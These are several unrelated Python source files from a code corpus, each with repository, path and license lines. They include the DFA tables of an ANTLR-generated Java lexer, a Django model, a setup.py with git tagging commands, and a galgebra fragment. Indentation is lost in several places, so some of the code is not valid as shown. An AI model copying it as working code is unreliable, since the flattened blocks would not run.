DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\176\20\uffff\1\177"),
DFA.unpack(u"\1\u0080"),
DFA.unpack(u"\1\u0081"),
DFA.unpack(u"\1\u0082"),
DFA.unpack(u"\1\u0083"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0084"),
DFA.unpack(u"\1\u0085"),
DFA.unpack(u"\1\u0087\1\u0086"),
DFA.unpack(u"\1\u0088"),
DFA.unpack(u"\1\u0089"),
DFA.unpack(u"\1\u008a"),
DFA.unpack(u"\1\u008b"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u008c\2\uffff\1\u008d"),
DFA.unpack(u"\1\u008f\10\uffff\1\u008e"),
DFA.unpack(u"\1\u0092\23\uffff\1\u0090\3\uffff\1\u0091"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0093"),
DFA.unpack(u"\1\u0094"),
DFA.unpack(u"\1\u0095"),
DFA.unpack(u"\1\u0096"),
DFA.unpack(u"\1\u0097"),
DFA.unpack(u"\1\u0098"),
DFA.unpack(u"\1\u0099"),
DFA.unpack(u"\1\u009a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\24\55\1\u009b\5\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u009d"),
DFA.unpack(u"\1\u009e"),
DFA.unpack(u"\1\u009f"),
DFA.unpack(u"\1\u00a0"),
DFA.unpack(u"\1\u00a1"),
DFA.unpack(u"\1\u00a2"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u00a3"),
DFA.unpack(u"\1\u00a4"),
DFA.unpack(u""),
DFA.unpack(u"\1\74\1\uffff\10\163\2\74\12\uffff\3\74\35\uffff\3"
u"\74"),
DFA.unpack(u""),
DFA.unpack(u"\1\74\1\uffff\12\165\12\uffff\3\74\35\uffff\3\74"),
DFA.unpack(u"\1\u00a6"),
DFA.unpack(u"\1\u00a7"),
DFA.unpack(u"\1\u00a8"),
DFA.unpack(u"\1\u00a9"),
DFA.unpack(u"\1\u00ab\2\uffff\1\u00aa"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\4\55\1\u00ac\25\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00ae"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00af"),
DFA.unpack(u"\1\u00b0"),
DFA.unpack(u"\1\u00b1"),
DFA.unpack(u"\1\u00b2"),
DFA.unpack(u"\1\u00b3"),
DFA.unpack(u"\1\u00b4"),
DFA.unpack(u"\1\u00b5"),
DFA.unpack(u"\1\u00b6"),
DFA.unpack(u"\1\u00b7"),
DFA.unpack(u"\1\u00b8"),
DFA.unpack(u"\1\u00b9"),
DFA.unpack(u"\1\u00ba"),
DFA.unpack(u"\1\u00bb"),
DFA.unpack(u"\1\u00bc"),
DFA.unpack(u"\1\u00bd"),
DFA.unpack(u"\1\u00be"),
DFA.unpack(u"\1\u00bf"),
DFA.unpack(u"\1\u00c0"),
DFA.unpack(u"\1\u00c1"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00c3"),
DFA.unpack(u"\1\u00c4"),
DFA.unpack(u"\1\u00c5"),
DFA.unpack(u"\1\u00c6"),
DFA.unpack(u"\1\u00c7"),
DFA.unpack(u"\1\u00c8"),
DFA.unpack(u"\1\u00c9"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00cb"),
DFA.unpack(u"\1\u00cc"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00cd"),
DFA.unpack(u"\1\u00ce"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00d0"),
DFA.unpack(u"\1\u00d1"),
DFA.unpack(u"\1\u00d2"),
DFA.unpack(u"\1\u00d3"),
DFA.unpack(u"\1\u00d4"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00d5"),
DFA.unpack(u"\1\u00d6"),
DFA.unpack(u"\1\u00d7"),
DFA.unpack(u"\1\u00d8"),
DFA.unpack(u"\1\u00d9"),
DFA.unpack(u"\1\u00da"),
DFA.unpack(u"\1\u00db"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00dc"),
DFA.unpack(u"\1\u00dd"),
DFA.unpack(u"\1\u00de"),
DFA.unpack(u"\1\u00df"),
DFA.unpack(u"\1\u00e0"),
DFA.unpack(u"\1\u00e1"),
DFA.unpack(u"\1\u00e2"),
DFA.unpack(u"\1\u00e3"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00e5"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00e7"),
DFA.unpack(u"\1\u00e8"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00ec"),
DFA.unpack(u"\1\u00ed"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00f0"),
DFA.unpack(u"\1\u00f1"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00f3"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00f5"),
DFA.unpack(u"\1\u00f6"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00f7"),
DFA.unpack(u"\1\u00f8"),
DFA.unpack(u"\1\u00f9"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00fb"),
DFA.unpack(u"\1\u00fc"),
DFA.unpack(u"\1\u00fd"),
DFA.unpack(u"\1\u00fe"),
DFA.unpack(u"\1\u00ff"),
DFA.unpack(u"\1\u0100"),
DFA.unpack(u"\1\u0101"),
DFA.unpack(u"\1\u0102"),
DFA.unpack(u"\1\u0103"),
DFA.unpack(u"\1\u0104"),
DFA.unpack(u"\1\u0105"),
DFA.unpack(u"\1\u0106"),
DFA.unpack(u"\1\u0107"),
DFA.unpack(u"\1\u0108"),
DFA.unpack(u"\1\u0109"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u010c"),
DFA.unpack(u"\1\u010d"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0110"),
DFA.unpack(u"\1\u0111"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0112"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\22\55\1\u0113\7\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0115"),
DFA.unpack(u"\1\u0116"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\13\55\1\u011a\16\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u011c"),
DFA.unpack(u"\1\u011d"),
DFA.unpack(u""),
DFA.unpack(u"\1\u011e"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0120"),
DFA.unpack(u"\1\u0121"),
DFA.unpack(u"\1\u0122"),
DFA.unpack(u"\1\u0123"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0125"),
DFA.unpack(u"\1\u0126"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0128"),
DFA.unpack(u"\1\u0129"),
DFA.unpack(u"\1\u012a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u012c"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u012e"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u012f"),
DFA.unpack(u"\1\u0130"),
DFA.unpack(u"\1\u0131"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0133"),
DFA.unpack(u"\1\u0134"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0135"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0137"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u013a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u013d"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u013f"),
DFA.unpack(u"\1\u0140"),
DFA.unpack(u"\1\u0141"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0142"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0143"),
DFA.unpack(u"\1\u0144"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0146"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0147"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u014b"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u014c"),
DFA.unpack(u""),
DFA.unpack(u"\1\u014d"),
DFA.unpack(u"\1\u014e"),
DFA.unpack(u"\1\u014f"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0151"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0154"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0157"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0159"),
DFA.unpack(u""),
DFA.unpack(u"\1\u015a"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u015e"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u015f"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"")
]
# class definition for DFA #29
DFA29 = DFA
def main(argv, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr):
from antlr3.main import LexerMain
main = LexerMain(JavaLexer)
main.stdin = stdin
main.stdout = stdout
main.stderr = stderr
main.execute(argv)
if __name__ == '__main__':
main(sys.argv)
|
leriomaggio/code-coherence-evaluation-tool
|
code_comments_coherence/source_code_analysis/code_analysis/JavaLexer.py
|
Python
|
bsd-3-clause
| 118,769
|
# coding: utf-8
from dj_diabetes.models import HatModel
class Foods(HatModel):
"""
Foods
"""
class Meta:
verbose_name = 'Foods'
verbose_name_plural = 'Foods'
def __str__(self):
return "%s" % self.title
|
foxmask/dj-diabetes
|
dj_diabetes/models/foods.py
|
Python
|
bsd-3-clause
| 254
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
from setuptools import setup, find_packages, Command
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
def read_reqs(name):
with open(os.path.join(os.path.dirname(__file__), name)) as f:
return [line for line in f.read().split('\n') if line and not line.strip().startswith('#')]
def read_version():
with open(os.path.join('lib', 'tri_declarative', '__init__.py')) as f:
m = re.search(r'''__version__\s*=\s*['"]([^'"]*)['"]''', f.read())
if m:
return m.group(1)
raise ValueError("couldn't find version")
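# For example (the version string below is illustrative), a line in
# lib/tri_declarative/__init__.py such as:
#     __version__ = '5.4.0'
# makes read_version() return '5.4.0'.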
class Tag(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from subprocess import call
version = read_version()
errno = call(['git', 'tag', '--annotate', version, '--message', 'Version %s' % version])
if errno == 0:
print("Added tag for version %s" % version)
raise SystemExit(errno)
class ReleaseCheck(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from subprocess import check_output, CalledProcessError
try:
tag = check_output(['git', 'describe', 'HEAD']).strip().decode('utf8')
except CalledProcessError:
tag = ''
version = read_version()
if tag != version:
print('Missing %s tag on release' % version)
raise SystemExit(1)
current_branch = check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip().decode('utf8')
if current_branch != 'master':
print('Only release from master')
raise SystemExit(1)
print("Ok to distribute files")
# NB: _don't_ add namespace_packages to setup(), it'll break
# everything using imp.find_module
setup(
name='tri.declarative',
version=read_version(),
description='tri.declarative contains class decorators to define classes with subclass semantics in the style of django Model classes.',
long_description=readme + '\n\n' + history,
author='Johan Lübcke',
author_email='johan.lubcke@trioptima.com',
url='https://github.com/TriOptima/tri.declarative',
packages=find_packages('lib'),
package_dir={'': 'lib'},
include_package_data=True,
install_requires=read_reqs('requirements.txt'),
license="BSD",
zip_safe=False,
keywords='tri.declarative',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
cmdclass={'tag': Tag,
'release_check': ReleaseCheck},
)
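# Usage sketch for the custom commands registered in cmdclass above
# (invocations inferred from the command names; not documented in this file):
#     python setup.py release_check   # verify HEAD is tagged and on master
#     python setup.py tag             # create an annotated git tag for __version__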
|
TriOptima/tri.declarative
|
setup.py
|
Python
|
bsd-3-clause
| 3,007
|
from __future__ import print_function
from sympy import symbols
from galgebra.deprecated import MV
from galgebra.printer import enhance_print,Get_Program,Print_Function
def MV_setup_options():
Print_Function()
